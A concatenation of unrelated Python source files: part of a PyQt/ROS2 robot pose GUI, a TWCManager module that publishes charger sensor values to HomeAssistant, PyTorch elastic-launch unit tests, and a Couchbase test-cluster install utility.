return pose_saver_box
def make_pose_goto_box(self):
combo_box = QGroupBox("go_to_pose")
combo_box_layout = QHBoxLayout()
combo_box_label = QLabel("pose_name")
combo = QComboBox()
combo.setMinimumWidth(400)
combo_box_button = QPushButton("go")
combo_box_button.setMaximumWidth(80)
combo_box_layout.addWidget(combo_box_label)
combo_box_layout.addWidget(combo)
combo_box_layout.addWidget(combo_box_button)
combo_box.setLayout(combo_box_layout)
combo.addItems(CommVariables.poses)
def combo_box_button_clicked():
pose = combo.currentText()
for i, v in enumerate(deg_pose_to_rad(CommVariables.poses[pose])):
CommVariables.to_robot.gui_joint_control[i] = v
self.force_slider_signal.emit()
combo_box_button.clicked.connect(combo_box_button_clicked)
def poses_changed():
combo.clear()
combo.addItems(CommVariables.poses)
self.poses_changed_signal.connect(poses_changed)
return combo_box
def make_current_pose_box(self):
current_pose_box = QGroupBox("current_pose")
current_pose_box_layout = QHBoxLayout()
current_pose_label = QLabel("")
current_pose_box_layout.addWidget(current_pose_label)
current_pose_box.setLayout(current_pose_box_layout)
def update_current_pose_label():
pose_name = pose_from_position(CommVariables.poses, rad_pose_to_deg(CommVariables.from_robot.position))
current_pose_label.setText(pose_name)
self.from_robot_changed_signal.connect(update_current_pose_label)
return current_pose_box
def main(args=None):
def launch_node():
def launch_node_callback_local():
rclpy.init(args=args)
gui = RobotGUI()
rclpy.spin(gui)
gui.destroy_node()
rclpy.shutdown()
t = threading.Thread(target=launch_node_callback_local)
t.daemon = True
t.start()
# Window has to be in the main thread
def launch_window():
app = QApplication(sys.argv)
clock = Window()
clock.show()
sys.exit(app.exec_())
launch_node()
launch_window()
if __name__ == '__main__':
main()
|
HASSStatus.py
|
# HomeAssistant Status Output
# Publishes the provided sensor key and value pair to a HomeAssistant instance
from ww import f
class HASSStatus:
import time
import threading
import requests
apiKey = None
config = None
configConfig = None
configHASS = None
debugLevel = 0
master = None
msgRateInSeconds = 60
resendRateInSeconds = 3600
retryRateInSeconds = 60
msgQueue = {}
status = False
serverIP = None
serverPort = 8123
useHttps = False
timeout = 2
backgroundTasksLock = threading.Lock()
backgroundTasksThread = None
def __init__(self, master):
self.config = master.config
self.master = master
try:
self.configConfig = self.config["config"]
except KeyError:
self.configConfig = {}
try:
self.configHASS = self.config["status"]["HASS"]
except KeyError:
self.configHASS = {}
self.status = self.configHASS.get("enabled", False)
self.serverIP = self.configHASS.get("serverIP", None)
self.serverPort = self.configHASS.get("serverPort", 8123)
self.useHttps = self.configHASS.get("useHttps", False)
self.apiKey = self.configHASS.get("apiKey", None)
self.msgRateInSeconds = self.configHASS.get("msgRateInSeconds", 60)
self.resendRateInSeconds = self.configHASS.get("resendRateInSeconds", 3600)
self.retryRateInSeconds = self.configHASS.get("retryRateInSeconds", 60)
self.debugLevel = self.configConfig.get("debugLevel", 0)
# Unload if this module is disabled or misconfigured
if (
(not self.status)
or (not self.serverIP)
or (int(self.serverPort) < 1)
or (not self.apiKey)
):
self.master.releaseModule("lib.TWCManager.Status", "HASSStatus")
else:
self.backgroundTasksThread = self.threading.Thread(
target=self.background_task_thread, args=()
)
self.backgroundTasksThread.daemon = True
self.backgroundTasksThread.start()
def getTwident(self, twcid):
# Format TWCID nicely
if len(twcid) == 2:
return "%02X%02X" % (twcid[0], twcid[1])
else:
return str(twcid.decode("utf-8"))
def background_task_thread(self):
while True:
self.time.sleep(self.msgRateInSeconds)
self.backgroundTasksLock.acquire()
for msgKey in self.msgQueue:
msg = self.msgQueue[msgKey]
if msg.elapsingTime < self.time.time():
self.sendingStatusToHASS(msg)
self.backgroundTasksLock.release()
def getSensorName(self, twcid, key_underscore):
return "sensor.twcmanager_" + str(self.getTwident(twcid)) + "_" + key_underscore
def setStatus(self, twcid, key_underscore, key_camelcase, value, unit):
self.backgroundTasksLock.acquire()
sensor = self.getSensorName(twcid, key_underscore)
if (sensor not in self.msgQueue) or (self.msgQueue[sensor].value != value):
self.msgQueue[sensor] = HASSMessage(
self.time.time(),
sensor,
twcid,
key_underscore,
key_camelcase,
value,
unit,
)
self.backgroundTasksLock.release()
def sendingStatusToHASS(self, msg):
http = "http://" if not (self.useHttps) else "https://"
url = http + self.serverIP + ":" + self.serverPort
url = url + "/api/states/" + msg.sensor
headers = {
"Authorization": "Bearer " + self.apiKey,
"content-type": "application/json",
}
try:
self.master.debugLog(
8,
"HASSStatus",
f(
"Sending POST request to HomeAssistant for sensor {msg.sensor} (value {msg.value})."
),
)
devclass = ""
if str.upper(msg.unit) in ["W", "A", "V", "KWH"]:
devclass = "power"
if len(msg.unit) > 0:
self.requests.post(
url,
json={
"state": msg.value,
"attributes": {
"unit_of_measurement": msg.unit,
"device_class": devclass,
"friendly_name": "TWC "
+ str(self.getTwident(msg.twcid))
+ " "
+ msg.key_camelcase,
},
},
timeout=self.timeout,
headers=headers,
)
else:
self.requests.post(
url,
json={
"state": msg.value,
"attributes": {
"friendly_name": "TWC "
+ str(self.getTwident(msg.twcid))
+ " "
+ msg.key_camelcase
},
},
timeout=self.timeout,
headers=headers,
)
# Setting elapsing time to now + resendRateInSeconds
self.msgQueue[msg.sensor].elapsingTime = (
self.time.time() + self.resendRateInSeconds
)
except self.requests.exceptions.ConnectionError as e:
self.master.debugLog(
4,
"HASSStatus",
"Error connecting to HomeAssistant to publish sensor values",
)
self.master.debugLog(10, "HASSStatus", str(e))
self.settingRetryRate(msg)
return False
except self.requests.exceptions.ReadTimeout as e:
self.master.debugLog(
4,
"HASSStatus",
"Error connecting to HomeAssistant to publish sensor values",
)
self.master.debugLog(10, "HASSStatus", str(e))
self.settingRetryRate(msg)
return False
except Exception as e:
self.master.debugLog(
4, "HASSStatus", "Error during publishing HomeAssistant sensor values"
)
self.master.debugLog(10, "HASSStatus", str(e))
self.settingRetryRate(msg)
return False
def settingRetryRate(self, msg):
# Setting elapsing time to now + retryRateInSeconds
self.msgQueue[msg.sensor].elapsingTime = (
self.time.time() + self.retryRateInSeconds
)
class HASSMessage:
elapsingTime = 0
sensor = ""
twcid = ""
key_underscore = ""
key_camelcase = ""
value = None
unit = ""
def __init__(
self, elapsingTime, sensor, twcid, key_underscore, key_camelcase, value, unit
):
self.elapsingTime = elapsingTime
self.sensor = sensor
self.twcid = twcid
self.key_underscore = key_underscore
self.key_camelcase = key_camelcase
self.value = value
self.unit = unit
|
run_test.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import os
import shutil
import subprocess
import tempfile
import unittest
import uuid
from contextlib import closing
from unittest import mock
from unittest.mock import Mock, patch
import torch.distributed.run as launch
from torch.distributed.elastic.agent.server.api import RunResult, WorkerState
from torch.distributed.elastic.multiprocessing.errors import ChildFailedError
from torch.distributed.elastic.rendezvous.etcd_server import EtcdServer
from torch.distributed.elastic.utils import get_socket_with_port
from torch.testing._internal.common_utils import (
TEST_WITH_ASAN,
TEST_WITH_TSAN,
)
def launch_in_proc(args):
launch.main(args)
def path(script):
return os.path.join(os.path.dirname(__file__), script)
def get_child_pids(pid):
pgrep = subprocess.Popen(args=f"pgrep -P {pid}", shell=True, stdout=subprocess.PIPE)
pgrep.wait()
out = pgrep.stdout.read().decode("utf-8").rstrip().split("\n")
pids = []
for pid in out:
if pid:
pids.append(int(pid))
return pids
def pid_exists(pid):
try:
os.kill(pid, 0)
return True
except OSError:
return False
class MockException(Exception):
pass
class ElasticLaunchTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
# start a standalone, single process etcd server to use for all tests
cls._etcd_server = EtcdServer()
cls._etcd_server.start()
cls._etcd_endpoint = cls._etcd_server.get_endpoint()
@classmethod
def tearDownClass(cls):
# stop the standalone etcd server
cls._etcd_server.stop()
def setUp(self):
self.test_dir = tempfile.mkdtemp()
# remove any lingering environment variables
for env in os.environ.keys():
if env.startswith("PET_"):
del os.environ[env]
# set a sentinel env var on the parent proc
# this should be present on the child and gets
# asserted in ``bin/test_script.py``
os.environ["TEST_SENTINEL_PARENT"] = "FOOBAR"
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_launch_user_script_python(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_launch_user_script_python_caffe2_bc(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
sock = get_socket_with_port()
with closing(sock):
master_port = sock.getsockname()[1]
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=fork",
"--master_addr=localhost",
f"--master_port={master_port}",
"--node_rank=0",
"--use_env",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_user_script_bash(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_with_env_vars(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
os.environ["PET_NNODES"] = str(nnodes)
os.environ["PET_NPROC_PER_NODE"] = str(nproc_per_node)
os.environ["PET_RDZV_BACKEND"] = "etcd"
os.environ["PET_RDZV_ENDPOINT"] = self._etcd_endpoint
os.environ["PET_RDZV_ID"] = run_id
os.environ["PET_MONITOR_INTERVAL"] = "1"
os.environ["PET_START_METHOD"] = "fork"
os.environ["PET_NO_PYTHON"] = "1"
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
os.environ["PET_MODULE"] = "1"
launch.main(script_args)
os.environ["PET_MODULE"] = "0"
launch.main(script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def _test_nproc_launch_configuration(self, nproc_type, expected_number):
run_id = str(uuid.uuid4().int)
nnodes = 1
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_type}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
launch.main(args + script_args)
world_size = nnodes * expected_number
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_auto_configurations(self):
self._test_nproc_launch_configuration("auto", os.cpu_count())
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_number_configurations(self):
self._test_nproc_launch_configuration("4", 4)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_unknown_configurations(self):
with self.assertRaises(ValueError):
self._test_nproc_launch_configuration("unknown", 4)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
@patch("torch.cuda.is_available", return_value=True)
@patch("torch.cuda.device_count", return_value=3)
def test_nproc_gpu_launch_configurations(self, _mock1, _mock2):
self._test_nproc_launch_configuration("auto", 3)
self._test_nproc_launch_configuration("gpu", 3)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
# we are only launching 1 node (even though max = 2)
world_size = nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@mock.patch("torch.distributed.elastic.events.record")
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic_worker_raise_exception(self, record_mock):
"""
Asserts that when the worker program fails and lancher raieses exception
to indicate that worker process failed
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=fork",
path("bin/test_script.py"),
"--fail",
]
with self.assertRaises(ChildFailedError):
launch.main(args)
record_mock.assert_called_once()
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
@mock.patch(
"torch.distributed.elastic.agent.server.local_elastic_agent.LocalElasticAgent.run"
)
@mock.patch("torch.distributed.elastic.events.record")
def test_launch_elastic_agent_raise_exception(self, record_mock, mock_agent_run):
"""
Asserts that when the agent raises an exception
the launcher re-raises the original exception
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
mock_agent_run.side_effect = MockException
with self.assertRaises(MockException):
launch.main(args)
record_mock.assert_called_once()
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_standalone(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--standalone",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic_multiple_agents(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
nnodes = 2
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
procs = []
for _ in range(nnodes - 1):
p = mp.Process(target=launch.main, args=[args])
procs.append(p)
p.start()
launch.main(args)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_min_max_nodes_parse(self):
min_nodes, max_nodes = launch.parse_min_max_nnodes("1")
self.assertTrue(min_nodes, max_nodes)
self.assertTrue(1, min_nodes)
min_nodes, max_nodes = launch.parse_min_max_nnodes("2:20")
self.assertTrue(2, min_nodes)
self.assertTrue(20, max_nodes)
with self.assertRaises(RuntimeError):
launch.parse_min_max_nnodes("2:20:30")
@patch("torch.distributed.launcher.api.LocalElasticAgent")
def test_launch_shutdown(self, agent_mock_cls):
nnodes = 1
nproc_per_node = 4
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
agent_mock = Mock()
agent_mock.run.return_value = RunResult(WorkerState.SUCCEEDED)
agent_mock_cls.return_value = agent_mock
rdzv_handler_mock = Mock()
with patch(
"torch.distributed.elastic.rendezvous.registry.get_rendezvous_handler"
) as param_mock:
param_mock.return_value = rdzv_handler_mock
launch.main(args)
rdzv_handler_mock.shutdown.assert_called_once()
|
install_utils.py
|
import getopt
import re
import subprocess
import sys
import threading
import time
sys.path = [".", "lib"] + sys.path
import testconstants
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
from membase.api.rest_client import RestConnection
import install_constants
import TestInput
import logging.config
import os.path
logging.config.fileConfig("scripts.logging.conf")
log = logging.getLogger()
NodeHelpers = []
# Default params
params = {
"version": None,
"install_tasks": install_constants.DEFAULT_INSTALL_TASKS,
"url": None,
"debug_logs": False,
"cb_edition": install_constants.CB_ENTERPRISE,
"timeout": install_constants.INSTALL_TIMEOUT,
"all_nodes_same_os": False,
"skip_local_download": True,
"storage_mode": "plasma",
"disable_consistency": False,
"enable_ipv6": False,
"use_domain_names": False,
"fts_quota": testconstants.FTS_QUOTA,
"fts_query_limit": 0
}
class build:
def __init__(self, name, url, path, product="cb"):
self.name = name
self.url = url
self.path = path
self.product = product
self.version = params["version"]
class NodeHelper:
def __init__(self, node):
self.node = node
self.ip = node.ip
self.params = params
self.build = None
self.queue = None
self.thread = None
self.rest = None
self.install_success = False
self.connect_ok = False
self.shell = None
self.info = None
self.enable_ipv6 = False
self.check_node_reachable()
self.nonroot = self.shell.nonroot
self.actions_dict = install_constants.NON_ROOT_CMDS if self.nonroot else install_constants.CMDS
def check_node_reachable(self):
start_time = time.time()
# Try 3 times
while time.time() < start_time + 60:
try:
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
self.info = self.shell.extract_remote_info()
self.connect_ok = True
if self.connect_ok:
break
except Exception as e:
log.warning("{0} unreachable, {1}, retrying..".format(self.ip, e))
time.sleep(20)
def get_os(self):
os = self.info.distribution_version.lower()
to_be_replaced = ['\n', ' ', 'gnu/linux']
for _ in to_be_replaced:
if _ in os:
os = os.replace(_, '')
if self.info.deliverable_type == "dmg":
major_version = os.split('.')
os = major_version[0] + '.' + major_version[1]
return os
def uninstall_cb(self):
need_nonroot_relogin = False
if self.shell.nonroot:
self.node.ssh_username = "root"
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
need_nonroot_relogin = True
if self.actions_dict[self.info.deliverable_type]["uninstall"]:
cmd = self.actions_dict[self.info.deliverable_type]["uninstall"]
if "msi" in cmd:
'''WINDOWS UNINSTALL'''
self.shell.terminate_processes(self.info, [s for s in testconstants.WIN_PROCESSES_KILLED])
self.shell.terminate_processes(self.info, \
[s + "-*" for s in testconstants.COUCHBASE_FROM_VERSION_3])
installed_version, _ = self.shell.execute_command(
"cat " + install_constants.DEFAULT_INSTALL_DIR["WINDOWS_SERVER"] + "VERSION.txt")
if len(installed_version) == 1:
installed_msi, _ = self.shell.execute_command(
"cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] + "; ls *" + installed_version[
0] + "*.msi")
if len(installed_msi) == 1:
self.shell.execute_command(
self.actions_dict[self.info.deliverable_type]["uninstall"].replace("installed-msi",
installed_msi[0]))
for browser in install_constants.WIN_BROWSERS:
self.shell.execute_command("taskkill /F /IM " + browser + " /T")
else:
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["uninstall"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.shell.terminate_processes(self.info, install_constants.PROCESSES_TO_TERMINATE)
if need_nonroot_relogin:
self.node.ssh_username = "nonroot"
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
def pre_install_cb(self):
if self.actions_dict[self.info.deliverable_type]["pre_install"]:
cmd = self.actions_dict[self.info.deliverable_type]["pre_install"]
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["pre_install"]
if cmd is not None:
if "HDIUTIL_DETACH_ATTACH" in cmd:
start_time = time.time()
while time.time() < start_time + timeout:
try:
ret = hdiutil_attach(self.shell, self.build.path)
if ret:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
else:
self.shell.execute_command(cmd, debug=self.params["debug_logs"])
self.wait_for_completion(duration, event)
def set_vm_swappiness_and_thp(self):
# set vm_swapiness to 0, and thp to never by default
# Check if this key is defined for this distribution/os
if "set_vm_swappiness_and_thp" in self.actions_dict[self.info.deliverable_type]:
try:
cmd = self.actions_dict[self.info.deliverable_type]["set_vm_swappiness_and_thp"]
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
except Exception as e:
log.warning("Could not set vm swappiness/THP.Exception {0} occurred on {1} ".format(e, self.ip))
def install_cb(self):
self.pre_install_cb()
self.set_vm_swappiness_and_thp()
if self.actions_dict[self.info.deliverable_type]["install"]:
if "suse" in self.get_os():
cmd = self.actions_dict[self.info.deliverable_type]["suse_install"]
else:
cmd = self.actions_dict[self.info.deliverable_type]["install"]
cmd = cmd.replace("buildbinary", self.build.name)
cmd = cmd.replace("buildpath", self.build.path)
cmd = cmd.replace("mountpoint", "/tmp/couchbase-server-" + params["version"])
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["install"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.post_install_cb()
def post_install_cb(self):
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["post_install"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
if self.actions_dict[self.info.deliverable_type]["post_install"]:
cmd = self.actions_dict[self.info.deliverable_type]["post_install"].replace("buildversion", self.build.version)
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
else:
if self.actions_dict[self.info.deliverable_type]["post_install_retry"]:
if self.info.deliverable_type == "msi":
check_if_downgrade, _ = self.shell.execute_command(
"cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] +
"; vi +\"set nobomb | set fenc=ascii | x\" install_status.txt; "
"grep 'Adding WIX_DOWNGRADE_DETECTED property' install_status.txt")
print((check_if_downgrade * 10))
else:
self.shell.execute_command(
self.actions_dict[self.info.deliverable_type]["post_install_retry"],
debug=self.params["debug_logs"])
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
def set_cbft_env_options(self, name, value, retries=3):
if self.get_os() in install_constants.LINUX_DISTROS:
while retries > 0:
if self.shell.file_exists("/opt/couchbase/bin/", "couchbase-server"):
ret, _ = self.shell.execute_command(install_constants.CBFT_ENV_OPTIONS[name].format(value))
self.shell.stop_server()
self.shell.start_server()
time.sleep(10)
if ret == ['1']:
log.info("{0} set to {1} on {2}".format(name, value, self.ip))
break
else:
time.sleep(20)
retries -= 1
else:
print_result_and_exit("Unable to set fts_query_limit on {0}".format(self.ip))
def _get_cli_path(self):
if self.nonroot:
if self.get_os() in install_constants.LINUX_DISTROS:
return install_constants.DEFAULT_NONROOT_CLI_PATH["LINUX_DISTROS"]
elif self.get_os() in install_constants.MACOS_VERSIONS:
return install_constants.DEFAULT_NONROOT_CLI_PATH["MACOS_VERSIONS"]
elif self.get_os() in install_constants.WINDOWS_SERVER:
return install_constants.DEFAULT_NONROOT_CLI_PATH["WINDOWS_SERVER"]
else:
if self.get_os() in install_constants.LINUX_DISTROS:
return install_constants.DEFAULT_CLI_PATH["LINUX_DISTROS"]
elif self.get_os() in install_constants.MACOS_VERSIONS:
return install_constants.DEFAULT_CLI_PATH["MACOS_VERSIONS"]
elif self.get_os() in install_constants.WINDOWS_SERVER:
return install_constants.DEFAULT_CLI_PATH["WINDOWS_SERVER"]
def _set_ip_version(self):
if params["enable_ipv6"]:
self.enable_ipv6 = True
if self.node.ip.startswith("["):
hostname = self.node.ip[self.node.ip.find("[") + 1:self.node.ip.find("]")]
else:
hostname = self.node.ip
cmd = install_constants.NODE_INIT["ipv6"].format(self._get_cli_path(),
self.ip,
hostname,
self.node.rest_username,
self.node.rest_password)
else:
cmd = install_constants.NODE_INIT["ipv4"].format(self._get_cli_path(),
self.ip,
self.node.rest_username,
self.node.rest_password)
self.shell.execute_command(cmd)
def pre_init_cb(self):
try:
self._set_ip_version()
if params["fts_query_limit"] > 0:
self.set_cbft_env_options("fts_query_limit", params["fts_query_limit"])
except Exception as e:
log.warning("Exception {0} occurred during pre-init".format(e))
def post_init_cb(self):
# Optionally change node name and restart server
if params.get('use_domain_names', False):
RemoteUtilHelper.use_hostname_for_server_settings(self.node)
# Optionally disable consistency check
if params.get('disable_consistency', False):
self.rest.set_couchdb_option(section='couchdb',
option='consistency_check_ratio',
value='0.0')
def get_services(self):
if not self.node.services:
return ["kv"]
elif self.node.services:
return self.node.services.split(',')
def allocate_memory_quotas(self):
kv_quota = 0
info = self.rest.get_nodes_self()
start_time = time.time()
while time.time() < start_time + 30 and kv_quota == 0:
kv_quota = int(info.mcdMemoryReserved * testconstants.CLUSTER_QUOTA_RATIO)
time.sleep(1)
self.services = self.get_services()
if "index" in self.services:
log.info("Setting INDEX memory quota as {0} MB on {1}".format(testconstants.INDEX_QUOTA, self.ip))
self.rest.set_service_memoryQuota(service='indexMemoryQuota', memoryQuota=testconstants.INDEX_QUOTA)
kv_quota -= testconstants.INDEX_QUOTA
if "fts" in self.services:
log.info("Setting FTS memory quota as {0} MB on {1}".format(params["fts_quota"], self.ip))
self.rest.set_service_memoryQuota(service='ftsMemoryQuota', memoryQuota=params["fts_quota"])
kv_quota -= params["fts_quota"]
if "cbas" in self.services:
log.info("Setting CBAS memory quota as {0} MB on {1}".format(testconstants.CBAS_QUOTA, self.ip))
self.rest.set_service_memoryQuota(service="cbasMemoryQuota", memoryQuota=testconstants.CBAS_QUOTA)
kv_quota -= testconstants.CBAS_QUOTA
if "kv" in self.services:
if kv_quota < testconstants.MIN_KV_QUOTA:
log.warning("KV memory quota is {0}MB but needs to be at least {1}MB on {2}".format(kv_quota,
testconstants.MIN_KV_QUOTA,
self.ip))
kv_quota = testconstants.MIN_KV_QUOTA
log.info("Setting KV memory quota as {0} MB on {1}".format(kv_quota, self.ip))
self.rest.init_cluster_memoryQuota(self.node.rest_username, self.node.rest_password, kv_quota)
def init_cb(self):
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["init"]
self.wait_for_completion(duration * 2, event)
start_time = time.time()
while time.time() < start_time + timeout:
try:
init_success = False
self.pre_init_cb()
self.rest = RestConnection(self.node)
# Make sure that data_path and index_path are writable by couchbase user
for path in set([_f for _f in [self.node.data_path, self.node.index_path] if _f]):
for cmd in ("rm -rf {0}/*".format(path),
"chown -R couchbase:couchbase {0}".format(path)):
self.shell.execute_command(cmd)
self.rest.set_data_path(data_path=self.node.data_path, index_path=self.node.index_path)
self.allocate_memory_quotas()
self.rest.init_node_services(hostname=None,
username=self.node.rest_username,
password=self.node.rest_password,
services=self.get_services())
if "index" in self.get_services():
if params["cb_edition"] == install_constants.CB_COMMUNITY:
params["storage_mode"] = "forestdb"
self.rest.set_indexer_storage_mode(storageMode=params["storage_mode"])
self.rest.init_cluster(username=self.node.rest_username,
password=self.node.rest_password)
init_success = True
if init_success:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.post_init_cb()
def wait_for_completion(self, duration, event):
if params["debug_logs"]:
log.info(event.format(duration, self.ip))
time.sleep(duration)
def cleanup_cb(self):
cmd = self.actions_dict[self.info.deliverable_type]["cleanup"]
if cmd:
try:
# Delete all but the most recently accessed build binaries
self.shell.execute_command(cmd, debug=self.params["debug_logs"])
except:
#ok to ignore
pass
def _get_mounted_volumes(shell):
volumes, _ = shell.execute_command("ls /tmp | grep '{0}'".format("couchbase-server-"))
return volumes
